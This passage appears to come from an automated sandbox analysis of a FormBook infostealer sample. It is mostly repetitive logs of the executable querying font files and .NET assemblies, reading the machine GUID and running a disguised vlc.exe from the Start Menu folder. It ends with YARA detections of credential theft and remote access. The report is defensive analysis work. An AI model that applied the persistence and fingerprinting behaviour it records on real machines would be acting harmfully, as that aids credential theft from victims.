Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\Public\oftmhayq.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
